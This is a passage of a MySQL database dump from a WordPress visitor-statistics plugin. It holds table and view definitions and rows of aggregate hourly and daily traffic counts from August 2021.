00:00:00','a:18:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:8:\"visitors\";s:1:\"3\";}i:1;a:2:{s:4:\"hour\";s:1:\"1\";s:8:\"visitors\";s:1:\"2\";}i:2;a:2:{s:4:\"hour\";s:1:\"2\";s:8:\"visitors\";s:1:\"2\";}i:3;a:2:{s:4:\"hour\";s:1:\"3\";s:8:\"visitors\";s:1:\"1\";}i:4;a:2:{s:4:\"hour\";s:1:\"4\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:1:\"5\";s:8:\"visitors\";s:1:\"4\";}i:6;a:2:{s:4:\"hour\";s:1:\"6\";s:8:\"visitors\";s:1:\"3\";}i:7;a:2:{s:4:\"hour\";s:1:\"8\";s:8:\"visitors\";s:1:\"2\";}i:8;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"2\";}i:9;a:2:{s:4:\"hour\";s:2:\"10\";s:8:\"visitors\";s:1:\"1\";}i:10;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"5\";}i:11;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"1\";}i:12;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"2\";}i:13;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"1\";}i:14;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"3\";}i:15;a:2:{s:4:\"hour\";s:2:\"20\";s:8:\"visitors\";s:1:\"3\";}i:16;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"1\";}i:17;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"6\";}}','+01:00'),(12,'hourWiseFirstVisitors','2021-08-15 00:00:00','a:16:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:8:\"visitors\";s:1:\"3\";}i:1;a:2:{s:4:\"hour\";s:1:\"1\";s:8:\"visitors\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"2\";s:8:\"visitors\";s:1:\"2\";}i:3;a:2:{s:4:\"hour\";s:1:\"3\";s:8:\"visitors\";s:1:\"1\";}i:4;a:2:{s:4:\"hour\";s:1:\"5\";s:8:\"visitors\";s:1:\"4\";}i:5;a:2:{s:4:\"hour\";s:1:\"6\";s:8:\"visitors\";s:1:\"3\";}i:6;a:2:{s:4:\"hour\";s:1:\"8\";s:8:\"visitors\";s:1:\"2\";}i:7;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"2\";}i:8;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"5\";}i:9;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"1\";}i:10;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"2\";}i:11;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"1\";}i:12;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"3\";}i:13;a:2:{s:4:\"hour\";s:2:\"20\";s:8:\"visitors\";s:1:\"3\";}i:14;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"1\";}i:15;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"6\";}}','+01:00'),(13,'hourWisePageViews','2021-08-16 00:00:00','a:4:{i:0;a:2:{s:4:\"hour\";s:1:\"2\";s:9:\"pageViews\";s:1:\"1\";}i:1;a:2:{s:4:\"hour\";s:2:\"12\";s:9:\"pageViews\";s:1:\"3\";}i:2;a:2:{s:4:\"hour\";s:2:\"13\";s:9:\"pageViews\";s:1:\"5\";}i:3;a:2:{s:4:\"hour\";s:2:\"18\";s:9:\"pageViews\";s:2:\"19\";}}','+01:00'),(14,'hourWiseVisitors','2021-08-16 00:00:00','a:1:{i:0;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"1\";}}','+01:00'),(15,'hourWiseFirstVisitors','2021-08-16 00:00:00','a:1:{i:0;a:2:{s:4:\"hour\";s:1:\"2\";s:8:\"visitors\";s:1:\"1\";}}','+01:00');
/*!40000 ALTER TABLE `wp_wsm_dailyhourlyreport` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Temporary table structure for view `wp_wsm_dateWiseBounce`
--

DROP TABLE IF EXISTS `wp_wsm_dateWiseBounce`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_dateWiseBounce`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_dateWiseBounce` AS SELECT 
 1 AS `recordDate`,
 1 AS `bounce`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_dateWiseBounceRate`
--

DROP TABLE IF EXISTS `wp_wsm_dateWiseBounceRate`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_dateWiseBounceRate`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_dateWiseBounceRate` AS SELECT 
 1 AS `recordDate`,
 1 AS `bounce`,
 1 AS `pageViews`,
 1 AS `visitors`,
 1 AS `bRatePageViews`,
 1 AS `bRateVisitors`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_dateWiseFirstVisitors`
--

DROP TABLE IF EXISTS `wp_wsm_dateWiseFirstVisitors`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_dateWiseFirstVisitors`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_dateWiseFirstVisitors` AS SELECT 
 1 AS `recordDate`,
 1 AS `visitors`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_dateWisePageViews`
--

DROP TABLE IF EXISTS `wp_wsm_dateWisePageViews`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_dateWisePageViews`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_dateWisePageViews` AS SELECT 
 1 AS `recordDate`,
 1 AS `pageViews`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_dateWiseVisitors`
--

DROP TABLE IF EXISTS `wp_wsm_dateWiseVisitors`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_dateWiseVisitors`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_dateWiseVisitors` AS SELECT 
 1 AS `recordDate`,
 1 AS `visitors`*/;
SET character_set_client = @saved_cs_client;

--
-- Table structure for table `wp_wsm_datewise_report`
--

DROP TABLE IF EXISTS `wp_wsm_datewise_report`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_datewise_report` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `date` date NOT NULL,
  `normal` int(2) NOT NULL DEFAULT '0',
  `hour` int(2) NOT NULL DEFAULT '0',
  `search_engine` varchar(255) NOT NULL DEFAULT '',
  `browser` int(2) NOT NULL DEFAULT '0',
  `screen` int(2) NOT NULL DEFAULT '0',
  `country` int(3) NOT NULL DEFAULT '0',
  `city` varchar(255) NOT NULL DEFAULT '',
  `operating_system` int(2) NOT NULL DEFAULT '0',
  `url_id` int(11) NOT NULL DEFAULT '0',
  `total_page_views` int(11) NOT NULL DEFAULT '0',
  `total_visitors` int(11) NOT NULL DEFAULT '0',
  `total_first_time_visitors` int(11) NOT NULL DEFAULT '0',
  `total_bounce` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=247 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_datewise_report`
--

LOCK TABLES `wp_wsm_datewise_report` WRITE;
/*!40000 ALTER TABLE `wp_wsm_datewise_report` DISABLE KEYS */;
INSERT INTO `wp_wsm_datewise_report` VALUES (1,'2021-08-12',1,0,'',0,0,0,'',0,0,41,25,25,23),(2,'2021-08-12',0,1,'',0,0,0,'',0,0,0,0,0,0),(3,'2021-08-12',0,2,'',0,0,0,'',0,0,0,0,0,0),(4,'2021-08-12',0,3,'',0,0,0,'',0,0,0,0,0,0),(5,'2021-08-12',0,4,'',0,0,0,'',0,0,0,0,0,0),(6,'2021-08-12',0,5,'',0,0,0,'',0,0,0,0,0,0),(7,'2021-08-12',0,6,'',0,0,0,'',0,0,0,0,0,0),(8,'2021-08-12',0,7,'',0,0,0,'',0,0,0,0,0,0),(9,'2021-08-12',0,8,'',0,0,0,'',0,0,0,0,0,0),(10,'2021-08-12',0,9,'',0,0,0,'',0,0,0,0,0,0),(11,'2021-08-12',0,10,'',0,0,0,'',0,0,0,0,0,0),(12,'2021-08-12',0,11,'',0,0,0,'',0,0,0,0,0,0),(13,'2021-08-12',0,12,'',0,0,0,'',0,0,0,0,0,0),(14,'2021-08-12',0,13,'',0,0,0,'',0,0,0,0,0,0),(15,'2021-08-12',0,14,'',0,0,0,'',0,0,1,1,1,1),(16,'2021-08-12',0,15,'',0,0,0,'',0,0,7,5,5,3),(17,'2021-08-12',0,16,'',0,0,0,'',0,0,3,3,3,1),(18,'2021-08-12',0,17,'',0,0,0,'',0,0,8,6,4,4),(19,'2021-08-12',0,18,'',0,0,0,'',0,0,4,1,0,1),(20,'2021-08-12',0,19,'',0,0,0,'',0,0,2,2,1,2),(21,'2021-08-12',0,20,'',0,0,0,'',0,0,2,2,2,2),(22,'2021-08-12',0,21,'',0,0,0,'',0,0,7,4,3,3),(23,'2021-08-12',0,22,'',0,0,0,'',0,0,5,4,4,4),(24,'2021-08-12',0,23,'',0,0,0,'',0,0,2,2,2,2),(25,'2021-08-12',0,24,'',0,0,0,'',0,0,0,0,0,0),(26,'2021-08-12',0,0,'google.com',0,0,0,'',0,0,12,5,5,0),(27,'2021-08-12',0,0,'bing.com',0,0,0,'',0,0,1,1,0,0),(28,'2021-08-12',0,0,'search.yahoo.com',0,0,0,'',0,0,1,1,0,0),(29,'2021-08-12',0,0,'',1,0,0,'',0,0,3,2,2,0),(30,'2021-08-12',0,0,'',2,0,0,'',0,0,14,14,0,0),(31,'2021-08-12',0,0,'',4,0,0,'',0,0,4,4,0,0),(32,'2021-08-12',0,0,'',13,0,0,'',0,0,5,5,0,0),(33,'2021-08-12',0,0,'',0,2,0,'',0,0,5,5,5,0),(34,'2021-08-12',0,0,'',0,12,0,'',0,0,3,3,0,0),(35,'2021-08-12',0,0,'',0,13,0,'',0,0,1,1,0,0),(36,'2021-08-12',0,0,'',0,19,0,'',0,0,3,3,0,0),(37,'2021-08-12',0,0,'',0,20,0,'',0,0,4,4,0,0),(38,'2021-08-12',0,0,'',0,25,0,'',0,0,1,1,0,0),(39,'2021-08-12',0,0,'',0,26,0,'',0,0,2,2,0,0),(40,'2021-08-12',0,0,'',0,27,0,'',0,0,1,1,0,0),(41,'2021-08-12',0,0,'',0,28,0,'',0,0,1,1,0,0),(42,'2021-08-12',0,0,'',0,29,0,'',0,0,1,1,0,0),(43,'2021-08-12',0,0,'',0,30,0,'',0,0,1,1,0,0),(44,'2021-08-12',0,0,'',0,31,0,'',0,0,1,1,0,0),(45,'2021-08-12',0,0,'',0,32,0,'',0,0,1,1,0,0),(46,'2021-08-12',0,0,'',0,0,84,'',0,0,2,1,1,0),(47,'2021-08-12',0,0,'',0,0,126,'',0,0,14,14,0,0),(48,'2021-08-12',0,0,'',0,0,215,'',0,0,1,1,0,0),(49,'2021-08-12',0,0,'',0,0,234,'',0,0,1,1,0,0),(50,'2021-08-12',0,0,'',0,0,235,'',0,0,1,1,0,0),(51,'2021-08-12',0,0,'',0,0,236,'',0,0,7,7,0,0),(52,'2021-08-12',0,0,'',0,0,0,'Chicago',0,0,2,2,2,0),(53,'2021-08-12',0,0,'',0,0,0,'Chigwell',0,0,1,1,0,0),(54,'2021-08-12',0,0,'',0,0,0,'Dubai',0,0,1,1,0,0),(55,'2021-08-12',0,0,'',0,0,0,'Monrovia',0,0,3,3,0,0),(56,'2021-08-12',0,0,'',0,0,0,'Naples',0,0,1,1,0,0),(57,'2021-08-12',0,0,'',0,0,0,'Novi',0,0,1,1,0,0),(58,'2021-08-12',0,0,'',0,0,0,'Robertsport',0,0,1,1,0,0),(59,'2021-08-12',0,0,'',0,0,0,'Stockholm',0,0,1,1,0,0),(60,'2021-08-12',0,0,'',0,0,0,'Tawalata',0,0,1,1,0,0),(61,'2021-08-12',0,0,'',0,0,0,'',8,0,18,7,7,0),(62,'2021-08-12',0,0,'',0,0,0,'',10,0,6,6,0,0),(63,'2021-08-12',0,0,'',0,0,0,'',11,0,3,3,0,0),(64,'2021-08-12',0,0,'',0,0,0,'',12,0,5,5,0,0),(65,'2021-08-12',0,0,'',0,0,0,'',13,0,1,1,0,0),(66,'2021-08-12',0,0,'',0,0,0,'',14,0,3,3,0,0),(67,'2021-08-12',0,0,'',0,0,0,'',0,4,12,5,5,0),(68,'2021-08-12',0,0,'',0,0,0,'',0,10,1,1,0,0),(69,'2021-08-12',0,0,'',0,0,0,'',0,17,1,1,0,0),(70,'2021-08-13',1,0,'',0,0,0,'',0,0,80,32,32,28),(71,'2021-08-13',0,1,'',0,0,0,'',0,0,2,2,2,2),(72,'2021-08-13',0,2,'',0,0,0,'',0,0,0,0,0,0),(73,'2021-08-13',0,3,'',0,0,0,'',0,0,1,1,1,1),(74,'2021-08-13',0,4,'',0,0,0,'',0,0,0,0,0,0),(75,'2021-08-13',0,5,'',0,0,0,'',0,0,4,2,2,2),(76,'2021-08-13',0,6,'',0,0,0,'',0,0,2,1,1,0),(77,'2021-08-13',0,7,'',0,0,0,'',0,0,2,2,1,1),(78,'2021-08-13',0,8,'',0,0,0,'',0,0,3,3,2,2),(79,'2021-08-13',0,9,'',0,0,0,'',0,0,4,2,1,1),(80,'2021-08-13',0,10,'',0,0,0,'',0,0,14,4,4,2),(81,'2021-08-13',0,11,'',0,0,0,'',0,0,15,3,2,2),(82,'2021-08-13',0,12,'',0,0,0,'',0,0,1,1,1,1),(83,'2021-08-13',0,13,'',0,0,0,'',0,0,10,6,6,5),(84,'2021-08-13',0,14,'',0,0,0,'',0,0,10,4,3,3),(85,'2021-08-13',0,15,'',0,0,0,'',0,0,7,3,2,2),(86,'2021-08-13',0,16,'',0,0,0,'',0,0,1,1,0,0),(87,'2021-08-13',0,17,'',0,0,0,'',0,0,1,1,1,1),(88,'2021-08-13',0,18,'',0,0,0,'',0,0,0,0,0,0),(89,'2021-08-13',0,19,'',0,0,0,'',0,0,1,1,1,1),(90,'2021-08-13',0,20,'',0,0,0,'',0,0,0,0,0,0),(91,'2021-08-13',0,21,'',0,0,0,'',0,0,0,0,0,0),(92,'2021-08-13',0,22,'',0,0,0,'',0,0,2,2,2,2),(93,'2021-08-13',0,23,'',0,0,0,'',0,0,0,0,0,0),(94,'2021-08-13',0,24,'',0,0,0,'',0,0,0,0,0,0),(95,'2021-08-13',0,0,'duckduckgo.com',0,0,0,'',0,0,4,2,1,0),(96,'2021-08-13',0,0,'google.com',0,0,0,'',0,0,9,9,0,0),(97,'2021-08-13',0,0,'bing.com',0,0,0,'',0,0,5,5,0,0),(98,'2021-08-13',0,0,'search.yahoo.com',0,0,0,'',0,0,1,1,0,0),(99,'2021-08-13',0,0,'',1,0,0,'',0,0,33,3,3,0),(100,'2021-08-13',0,0,'',2,0,0,'',0,0,15,15,0,0),(101,'2021-08-13',0,0,'',3,0,0,'',0,0,1,1,0,0),(102,'2021-08-13',0,0,'',4,0,0,'',0,0,3,3,0,0),(103,'2021-08-13',0,0,'',13,0,0,'',0,0,10,10,0,0),(104,'2021-08-13',0,0,'',0,2,0,'',0,0,10,10,10,0),(105,'2021-08-13',0,0,'',0,12,0,'',0,0,1,1,0,0),(106,'2021-08-13',0,0,'',0,13,0,'',0,0,1,1,0,0),(107,'2021-08-13',0,0,'',0,14,0,'',0,0,1,1,0,0),(108,'2021-08-13',0,0,'',0,19,0,'',0,0,4,4,0,0),(109,'2021-08-13',0,0,'',0,20,0,'',0,0,5,5,0,0),(110,'2021-08-13',0,0,'',0,21,0,'',0,0,1,1,0,0),(111,'2021-08-13',0,0,'',0,22,0,'',0,0,4,4,0,0),(112,'2021-08-13',0,0,'',0,25,0,'',0,0,1,1,0,0),(113,'2021-08-13',0,0,'',0,27,0,'',0,0,1,1,0,0),(114,'2021-08-13',0,0,'',0,33,0,'',0,0,1,1,0,0),(115,'2021-08-13',0,0,'',0,34,0,'',0,0,1,1,0,0),(116,'2021-08-13',0,0,'',0,35,0,'',0,0,1,1,0,0),(117,'2021-08-13',0,0,'',0,0,22,'',0,0,3,1,1,0),(118,'2021-08-13',0,0,'',0,0,110,'',0,0,1,1,0,0),(119,'2021-08-13',0,0,'',0,0,119,'',0,0,1,1,0,0),(120,'2021-08-13',0,0,'',0,0,126,'',0,0,11,11,0,0),(121,'2021-08-13',0,0,'',0,0,183,'',0,0,1,1,0,0),(122,'2021-08-13',0,0,'',0,0,199,'',0,0,1,1,0,0),(123,'2021-08-13',0,0,'',0,0,200,'',0,0,1,1,0,0),(124,'2021-08-13',0,0,'',0,0,206,'',0,0,1,1,0,0),(125,'2021-08-13',0,0,'',0,0,236,'',0,0,14,14,0,0),(126,'2021-08-13',0,0,'',0,0,0,'Brussels',0,0,3,1,1,0),(127,'2021-08-13',0,0,'',0,0,0,'Cape Town',0,0,1,1,0,0),(128,'2021-08-13',0,0,'',0,0,0,'Chicago',0,0,7,7,0,0),(129,'2021-08-13',0,0,'',0,0,0,'Incheon',0,0,1,1,0,0),(130,'2021-08-13',0,0,'',0,0,0,'Lyubertsy',0,0,1,1,0,0),(131,'2021-08-13',0,0,'',0,0,0,'Milwaukee',0,0,1,1,0,0),(132,'2021-08-13',0,0,'',0,0,0,'Monrovia',0,0,4,4,0,0),(133,'2021-08-13',0,0,'',0,0,0,'Singapore',0,0,1,1,0,0),(134,'2021-08-13',0,0,'',0,0,0,'Tubmanburg',0,0,1,1,0,0),(135,'2021-08-13',0,0,'',0,0,0,'Washington',0,0,1,1,0,0),(136,'2021-08-13',0,0,'',0,0,0,'West Fargo',0,0,1,1,0,0),(137,'2021-08-13',0,0,'',0,0,0,'',3,0,4,1,1,0),(138,'2021-08-13',0,0,'',0,0,0,'',8,0,16,16,0,0),(139,'2021-08-13',0,0,'',0,0,0,'',10,0,1,1,0,0),(140,'2021-08-13',0,0,'',0,0,0,'',11,0,1,1,0,0),(141,'2021-08-13',0,0,'',0,0,0,'',12,0,10,10,0,0),(142,'2021-08-13',0,0,'',0,0,0,'',14,0,3,3,0,0),(143,'2021-08-13',0,0,'',0,0,0,'',0,4,50,9,9,0),(144,'2021-08-13',0,0,'',0,0,0,'',0,10,5,5,0,0),(145,'2021-08-13',0,0,'',0,0,0,'',0,17,1,1,0,0),(146,'2021-08-13',0,0,'',0,0,0,'',0,31,1,1,0,0),(147,'2021-08-13',0,0,'',0,0,0,'',0,42,1,1,0,0),(148,'2021-08-13',0,0,'',0,0,0,'',0,49,1,1,0,0),(149,'2021-08-14',1,0,'',0,0,0,'',0,0,35,23,23,20),(150,'2021-08-14',0,1,'',0,0,0,'',0,0,8,1,1,0),(151,'2021-08-14',0,2,'',0,0,0,'',0,0,1,1,1,1),(152,'2021-08-14',0,3,'',0,0,0,'',0,0,1,1,1,1),(153,'2021-08-14',0,4,'',0,0,0,'',0,0,0,0,0,0),(154,'2021-08-14',0,5,'',0,0,0,'',0,0,2,2,2,2),(155,'2021-08-14',0,6,'',0,0,0,'',0,0,0,0,0,0),(156,'2021-08-14',0,7,'',0,0,0,'',0,0,0,0,0,0),(157,'2021-08-14',0,8,'',0,0,0,'',0,0,0,0,0,0),(158,'2021-08-14',0,9,'',0,0,0,'',0,0,0,0,0,0),(159,'2021-08-14',0,10,'',0,0,0,'',0,0,1,1,1,1),(160,'2021-08-14',0,11,'',0,0,0,'',0,0,5,2,2,1),(161,'2021-08-14',0,12,'',0,0,0,'',0,0,1,1,1,1),(162,'2021-08-14',0,13,'',0,0,0,'',0,0,1,1,1,1),(163,'2021-08-14',0,14,'',0,0,0,'',0,0,2,2,2,2),(164,'2021-08-14',0,15,'',0,0,0,'',0,0,3,3,3,3),(165,'2021-08-14',0,16,'',0,0,0,'',0,0,0,0,0,0),(166,'2021-08-14',0,17,'',0,0,0,'',0,0,0,0,0,0),(167,'2021-08-14',0,18,'',0,0,0,'',0,0,4,3,3,2),(168,'2021-08-14',0,19,'',0,0,0,'',0,0,1,1,1,1),(169,'2021-08-14',0,20,'',0,0,0,'',0,0,0,0,0,0),(170,'2021-08-14',0,21,'',0,0,0,'',0,0,0,0,0,0),(171,'2021-08-14',0,22,'',0,0,0,'',0,0,0,0,0,0),(172,'2021-08-14',0,23,'',0,0,0,'',0,0,1,1,1,1),(173,'2021-08-14',0,24,'',0,0,0,'',0,0,4,3,3,3),(174,'2021-08-14',0,0,'duckduckgo.com',0,0,0,'',0,0,2,2,1,0),(175,'2021-08-14',0,0,'google.com',0,0,0,'',0,0,7,7,0,0),(176,'2021-08-14',0,0,'',1,0,0,'',0,0,3,2,2,0),(177,'2021-08-14',0,0,'',2,0,0,'',0,0,13,13,0,0),(178,'2021-08-14',0,0,'',4,0,0,'',0,0,1,1,0,0),(179,'2021-08-14',0,0,'',13,0,0,'',0,0,7,7,0,0),(180,'2021-08-14',0,0,'',0,2,0,'',0,0,8,8,8,0),(181,'2021-08-14',0,0,'',0,19,0,'',0,0,1,1,0,0),(182,'2021-08-14',0,0,'',0,20,0,'',0,0,1,1,0,0),(183,'2021-08-14',0,0,'',0,22,0,'',0,0,1,1,0,0),(184,'2021-08-14',0,0,'',0,25,0,'',0,0,1,1,0,0),(185,'2021-08-14',0,0,'',0,27,0,'',0,0,1,1,0,0),(186,'2021-08-14',0,0,'',0,33,0,'',0,0,3,3,0,0),(187,'2021-08-14',0,0,'',0,36,0,'',0,0,1,1,0,0),(188,'2021-08-14',0,0,'',0,37,0,'',0,0,1,1,0,0),(189,'2021-08-14',0,0,'',0,38,0,'',0,0,1,1,0,0),(190,'2021-08-14',0,0,'',0,39,0,'',0,0,2,2,0,0),(191,'2021-08-14',0,0,'',0,40,0,'',0,0,1,1,0,0),(192,'2021-08-14',0,0,'',0,41,0,'',0,0,1,1,0,0),(193,'2021-08-14',0,0,'',0,0,46,'',0,0,1,1,1,0),(194,'2021-08-14',0,0,'',0,0,83,'',0,0,1,1,0,0),(195,'2021-08-14',0,0,'',0,0,103,'',0,0,1,1,0,0),(196,'2021-08-14',0,0,'',0,0,110,'',0,0,1,1,0,0),(197,'2021-08-14',0,0,'',0,0,126,'',0,0,10,10,0,0),(198,'2021-08-14',0,0,'',0,0,179,'',0,0,1,1,0,0),(199,'2021-08-14',0,0,'',0,0,236,'',0,0,8,8,0,0),(200,'2021-08-14',0,0,'',0,0,0,'Bonn',0,0,1,1,1,0),(201,'2021-08-14',0,0,'',0,0,0,'Chicago',0,0,6,6,0,0),(202,'2021-08-14',0,0,'',0,0,0,'Monrovia',0,0,1,1,0,0),(203,'2021-08-14',0,0,'',0,0,0,'New Delhi',0,0,1,1,0,0),(204,'2021-08-14',0,0,'',0,0,0,'Robertsport',0,0,4,4,0,0),(205,'2021-08-14',0,0,'',0,0,0,'San Juan',0,0,1,1,0,0),(206,'2021-08-14',0,0,'',0,0,0,'Shanghai',0,0,1,1,0,0),(207,'2021-08-14',0,0,'',0,0,0,'',3,0,1,1,1,0),(208,'2021-08-14',0,0,'',0,0,0,'',8,0,5,5,0,0),(209,'2021-08-14',0,0,'',0,0,0,'',10,0,8,8,0,0),(210,'2021-08-14',0,0,'',0,0,0,'',11,0,1,1,0,0),(211,'2021-08-14',0,0,'',0,0,0,'',12,0,7,7,0,0),(212,'2021-08-14',0,0,'',0,0,0,'',14,0,1,1,0,0),(213,'2021-08-14',0,0,'',0,0,0,'',0,4,15,7,7,0),(214,'2021-08-14',0,0,'',0,0,0,'',0,31,1,1,0,0),(215,'2021-08-14',0,0,'',0,0,0,'',0,42,2,2,0,0),(216,'2021-08-14',0,0,'',0,0,0,'',0,71,1,1,0,0),(217,'2021-08-14',0,0,'',0,0,0,'',0,75,1,1,0,0),(218,'2021-08-16',1,0,'',0,0,0,'',0,0,28,1,1,0),(219,'2021-08-16',0,1,'',0,0,0,'',0,0,0,0,0,0),(220,'2021-08-16',0,2,'',0,0,0,'',0,0,0,0,0,0),(221,'2021-08-16',0,3,'',0,0,0,'',0,0,3,1,1,0),(222,'2021-08-16',0,4,'',0,0,0,'',0,0,0,0,0,0),(223,'2021-08-16',0,5,'',0,0,0,'',0,0,0,0,0,0),(224,'2021-08-16',0,6,'',0,0,0,'',0,0,0,0,0,0),(225,'2021-08-16',0,7,'',0,0,0,'',0,0,0,0,0,0),(226,'2021-08-16',0,8,'',0,0,0,'',0,0,0,0,0,0),(227,'2021-08-16',0,9,'',0,0,0,'',0,0,0,0,0,0),(228,'2021-08-16',0,10,'',0,0,0,'',0,0,0,0,0,0),(229,'2021-08-16',0,11,'',0,0,0,'',0,0,0,0,0,0),(230,'2021-08-16',0,12,'',0,0,0,'',0,0,0,0,0,0),(231,'2021-08-16',0,13,'',0,0,0,'',0,0,16,1,0,0),(232,'2021-08-16',0,14,'',0,0,0,'',0,0,5,1,0,0),(233,'2021-08-16',0,15,'',0,0,0,'',0,0,0,0,0,0),(234,'2021-08-16',0,16,'',0,0,0,'',0,0,0,0,0,0),(235,'2021-08-16',0,17,'',0,0,0,'',0,0,3,1,0,0),(236,'2021-08-16',0,18,'',0,0,0,'',0,0,0,0,0,0),(237,'2021-08-16',0,19,'',0,0,0,'',0,0,1,1,0,0),(238,'2021-08-16',0,20,'',0,0,0,'',0,0,0,0,0,0),(239,'2021-08-16',0,21,'',0,0,0,'',0,0,0,0,0,0),(240,'2021-08-16',0,22,'',0,0,0,'',0,0,0,0,0,0),(241,'2021-08-16',0,23,'',0,0,0,'',0,0,0,0,0,0),(242,'2021-08-16',0,24,'',0,0,0,'',0,0,0,0,0,0),(243,'2021-08-16',0,0,'',2,0,0,'',0,0,28,1,1,0),(244,'2021-08-16',0,0,'',0,19,0,'',0,0,28,1,1,0),(245,'2021-08-16',0,0,'',0,0,0,'Not found',0,0,28,1,1,0),(246,'2021-08-16',0,0,'',0,0,0,'',8,0,28,1,1,0);
/*!40000 ALTER TABLE `wp_wsm_datewise_report` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Temporary table structure for view `wp_wsm_datewisevisitors`
--

DROP TABLE IF EXISTS `wp_wsm_datewisevisitors`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_datewisevisitors`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_datewisevisitors` AS SELECT 
 1 AS `recordDate`,
 1 AS `visitors`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_hourWiseBounce`
--

DROP TABLE IF EXISTS `wp_wsm_hourWiseBounce`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_hourWiseBounce`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_hourWiseBounce` AS SELECT 
 1 AS `hour`,
 1 AS `bounce`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_hourWiseBounceRate`
--

DROP TABLE IF EXISTS `wp_wsm_hourWiseBounceRate`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_hourWiseBounceRate`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_hourWiseBounceRate` AS SELECT 
 1 AS `hour`,
 1 AS `bounce`,
 1 AS `pageViews`,
 1 AS `visitors`,
 1 AS `bRatePageViews`,
 1 AS `bRateVisitors`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_hourWiseFirstVisitors`
--

DROP TABLE IF EXISTS `wp_wsm_hourWiseFirstVisitors`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_hourWiseFirstVisitors`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_hourWiseFirstVisitors` AS SELECT 
 1 AS `hour`,
 1 AS `visitors`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_hourWisePageViews`
--

DROP TABLE IF EXISTS `wp_wsm_hourWisePageViews`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_hourWisePageViews`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_hourWisePageViews` AS SELECT 
 1 AS `hour`,
 1 AS `pageViews`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_hourWiseVisitors`
--

DROP TABLE IF EXISTS `wp_wsm_hourWiseVisitors`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_hourWiseVisitors`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_hourWiseVisitors` AS SELECT 
 1 AS `hour`,
 1 AS `visitors`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_hourwisevisitors`
--

DROP TABLE IF EXISTS `wp_wsm_hourwisevisitors`;
